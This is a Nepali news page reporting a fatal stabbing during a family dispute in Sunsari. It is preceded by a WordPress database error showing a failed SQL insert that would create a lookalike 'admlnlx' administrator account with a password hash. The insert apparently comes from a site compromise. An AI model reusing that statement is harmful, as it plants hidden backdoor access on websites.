WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5rwJ4hJK.H9aalYPCbxB0cYmPrXOe1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 06:00:47', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ९ भदौ, सुनसरी । सुनसरी जिल्लाको भोक्राहा नरसिंह गाँउपालिका–५ मा आइतबार साँझ एक जनाको छुरा प्रहार गरी हत्या भएको छ ।
स्थानीय मुर्ताज मियाँले धारिलो हतियार प्रहार गरेर वहाव मियाँको हत्या गरेको जिल्ला प्रहरी कार्यालय सुनसरीले जनाएको छ ।
घरायसी झगडाका हुँदा मुर्ताज मियाँले छुरा प्रहार गर्दा वहाव गम्भीर घाइते भएका थिए । घाइते वहावको उपचारका क्रममा मृत्यु भएको जिल्ला प्रहरी कार्यालय सुनसरीले जनाएको छ । छुरा प्रहार गर्ने मुर्ताजले बीस सेवन गरेकाले उनी पनि गम्भीर घाइते भएको र अहिले विराटनगरमा उपचार भइरहेको जिल्ला प्रहरी कार्यालय सुनसरीले जनाएको छ ।
sourse:onlinekhabar